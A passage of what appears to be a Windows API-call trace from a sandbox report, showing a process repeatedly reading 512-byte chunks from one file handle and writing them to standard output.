returned 1 [0144.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.174] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.175] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.175] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] GetFileType (hFile=0x50) returned 0x1 [0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, 
lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.176] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.176] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.178] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.178] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, 
lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.179] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.179] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, 
lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.180] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.180] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 
[0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.182] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.182] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: 
lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.183] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.183] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle 
